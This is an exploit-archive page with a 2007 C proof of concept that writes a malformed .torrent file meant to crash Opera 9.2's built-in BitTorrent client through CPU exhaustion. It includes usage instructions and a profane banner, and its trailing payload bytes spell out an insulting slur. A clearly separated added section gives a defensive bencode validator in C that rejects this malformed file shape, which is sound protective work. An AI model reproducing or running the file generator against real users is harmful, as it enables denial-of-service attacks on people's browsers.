
  Title : Opera 9.2 (torrent File) Remote Denial of Service Exploit
  ExploitAlert : 2317
  Author : n00b
  Date : 24.04.2007


  Code :

/************************************************************************


* Created Date :April 23 2007
*
* Credits go to n00b for finding this vulnerability and writing p0c.
* Moderator of http://igniteds.net
*
* 0pera 9.2 torrent file remote dos exploit.
*
* opera has its own bit torrent client with-in the web browser
* it is possible to crash opera with a malformed torrent file
* causing denial of service to legitimate users..Opera will
* use 100% cpu till the inevitable happens..Which will be a crash
* To fix this problem disable the bitorrent with in opera..
*
* Tested : win xp service pack 1 and 2
*
* I wasn't able to catch any debugging info I'm afraid maybe some one
* else can give it a go.
*
* All i was able to get from drwatson pmsl was.
************************************************************************

* Application exception occurred:
* App: C:\Program Files\Opera\Opera.exe (pid=1084)
* When: 4/22/2007 @ 14:55:29.296
* Exception number: 80000003 (hard coded breakpoint)
************************************************************************

* Seems like some sort of memory leak with the bitorrent client
* of opera..
************************************************************************

********************************
**/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "\x64\x38";

char My_buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

char trailing_buff[] =
"\x36\x31\x3a\x09\x44\x69\x65\x20\x6f\x70\x65\x72\x61"
"\x20\x79\x6f\x75\x20\x73\x6c\x75\x74";

int main(int argc,char* argv[])
{
system("cls");

printf("\n *************************************************");
printf("\n * Opera torrent file dos exploit by n00b *");
printf("\n *************************************************");
printf("\n * Shouts to every one at milw0rm *");
printf("\n *************************************************");
printf("\n * Special thanks to str0ke *");
printf("\n * *");
printf("\n * Date :Aprill 23 2007 *");
printf("\n *************************************************");
printf("\n * CREDITS TO n00b FOR FINDING THIS BUG *");
printf("\n *************************************************");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFuck some thing went wrong :D");
exit(1);
}

printf("\n\nMaking torrent file...");

fwrite(header,1,sizeof(header),f);

fwrite(My_buff,1,sizeof(My_buff),f);

fwrite(trailing_buff,1,sizeof(trailing_buff),f);

printf("\nDone hoooooha!");
printf("\n ");
printf("\n0h noes memory leak pmsl !!");
return 0;
}

void usage(char* file)
{

printf("\n\nusage: n00b.exe opera.torrent");
exit(1);
}
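
The file this PoC writes begins with the bytes `d8` followed by `A` (0x41) bytes, so the first dictionary key has a length prefix that is never followed by `:` and the file is not well-formed bencode. As an added example (not part of n00b's code and not Opera's), here is a strict structural validator that a download gateway or client could run before handing a .torrent file to a parser; `torrent_is_wellformed`, `bvalue`, `check` and `MAX_DEPTH` are names assumed here, and dictionary key ordering is not checked.

```c
#include <string.h>
#define MAX_DEPTH 32 /* assumed nesting limit for this example */
static int is_digit(unsigned char c) { return c >= '0' && c <= '9'; }

/* Consume one bencoded value at *p; return 1 on success, 0 if malformed. */
static int bvalue(const unsigned char **p, const unsigned char *end, int depth)
{
    if (*p >= end || depth > MAX_DEPTH) return 0;
    unsigned char c = **p;
    const unsigned char *q = *p + 1, *d;
    if (c == 'i') {                          /* integer: i [-] digits e */
        if (q < end && *q == '-') q++;
        for (d = q; q < end && is_digit(*q); q++) ;
        if (q == d || q >= end || *q != 'e') return 0;
        if (*d == '0' && (q - d > 1 || d[-1] == '-')) return 0; /* 007, -0 */
        *p = q + 1;
        return 1;
    }
    if (is_digit(c)) {                       /* string: length ':' bytes */
        size_t len = 0;
        for (q = *p; q < end && is_digit(*q); q++) {
            if (len > (size_t)(end - q) / 10) return 0; /* exceeds input */
            len = len * 10 + (size_t)(*q - '0');
        }
        if (q >= end || *q != ':' || len > (size_t)(end - q - 1)) return 0;
        *p = q + 1 + len;
        return 1;
    }
    if (c != 'l' && c != 'd') return 0;      /* unknown type byte */
    for (*p = q; *p < end && **p != 'e'; ) { /* list items or key/value pairs */
        if (c == 'd' && !(is_digit(**p) && bvalue(p, end, depth + 1))) return 0;
        if (!bvalue(p, end, depth + 1)) return 0;
    }
    if (*p >= end) return 0;                 /* container never closed */
    (*p)++;
    return 1;
}

/* A .torrent metainfo file must be exactly one well-formed dictionary. */
int torrent_is_wellformed(const unsigned char *buf, size_t n)
{
    const unsigned char *p = buf;
    return n > 0 && buf[0] == 'd' && bvalue(&p, buf + n, 0) && p == buf + n;
}

/* Constructed samples: a minimal valid dictionary, then the "d8" + 'A' shape. */
static int check(const char *s)
{ return torrent_is_wellformed((const unsigned char *)s, strlen(s)); }
int main(void) { return !check("d4:name1:ae") || check("d8AAAAAAAA"); }
```

The program exits with status 0 when the valid sample is accepted and the malformed one is rejected.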



Copyright © SecurityReason. All Rights Reserved.